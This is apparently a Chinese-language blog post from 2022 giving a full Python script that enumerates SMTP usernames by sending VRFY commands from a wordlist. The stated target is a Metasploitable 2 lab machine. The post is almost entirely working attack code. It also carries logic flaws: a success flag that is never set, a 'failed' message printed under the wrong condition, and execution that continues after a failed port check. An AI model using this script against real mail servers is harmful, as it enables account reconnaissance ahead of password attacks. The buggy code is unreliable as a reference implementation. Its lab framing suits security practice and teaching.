利用Python破解SMTP服务器用户名

   本代码运行以及测试环境:用Kali Linux运行Python代码,目标机器为Metasploitable 2,该目标运行SMTP服务.

 1 import socket
 2 import optparse
 3 import os
 4 import sys
 5 import termcolor
 6 
 7 class SMTPUserCrack:
 8     def __init__(self) -> None:
 9         self.target = self.get_params()[0]
10         self.port  = self.get_params()[1]
11         self.filename = self.get_params()[2]
12 
13     def get_params(self):
14         parser = optparse.OptionParser('Usage: <Program> -t server IP address -p port -f wordlist of username')
15         parser.add_option('-t', '--target', dest='target', type='string', help="Specify target IP address")
16         parser.add_option('-p', '--port', dest='port', type='int', help="Spcify smtp server port")
17         parser.add_option('-f', '--filename', dest='filename', type='string', help='Specify wordlsit')
18         options, args = parser.parse_args()
19         if options.target is None or options.filename is None:
20             print(parser.usage)
21             sys.exit(0)
22         if options.port is None:
23             options.port = 25
24         if not os.path.exists(options.filename):
25             print("[-] The file does not exit")
26             sys.exit(0)
27         return options.target, options.port, options.filename  
28 
29     def port_scan(self):   #如果目标端口不开放,则退出
30         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
31         s.settimeout(2)
32         if not s.connect_ex((self.target, self.port)):
33             s.close()
34             return True
35         else:
36             s.close()
37             return False               
38     
39 
40     def check_user(self, username):
41         try:
42             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43             s.settimeout(2)
44             s.connect((self.target,self.port))
45             recv_data = s.recv(1024)
46             command = 'VRFY %s\n' % username
47             s.send(command.encode('utf-8'))
48             response = s.recv(1024).decode('utf-8')           
49             if '252' in response:      #用户名不存在的时候,响应码会不一样
50                 print("\t[+] SMTP User Found: \t",  termcolor.colored(username,'blue'))
51                 return True
52 
53         except Exception as e:
54             pass           
55 
56         finally:
57             s.close()
58     
59     def run(self):        
60         if not self.port_scan():
61             print("[-] The target has no SMTP service running over the port: %d" % self.port)
62         
63         crack_flag = False
64         
65         print("[-] The port is running smtp service: %d" % self.port)
66         with open(self.filename,'r') as f:
67             for line in f.readlines():
68                 username = line.strip()
69               
70                 res = self.check_user(username)
71                 if crack_flag == True:
72                     sys.exit()
73                
74         if crack_flag == True:   #如果遍历字典中所有的行以后,仍然没有匹配,则表明破解失败
75             print("[-] Failed to crack")
76 
77 
78 if __name__ == "__main__":
79     smtpuser = SMTPUserCrack()
80     smtpuser.run()

 

posted @ 2022-05-26 18:43  Jason_huawen  阅读(108)  评论(0编辑  收藏  举报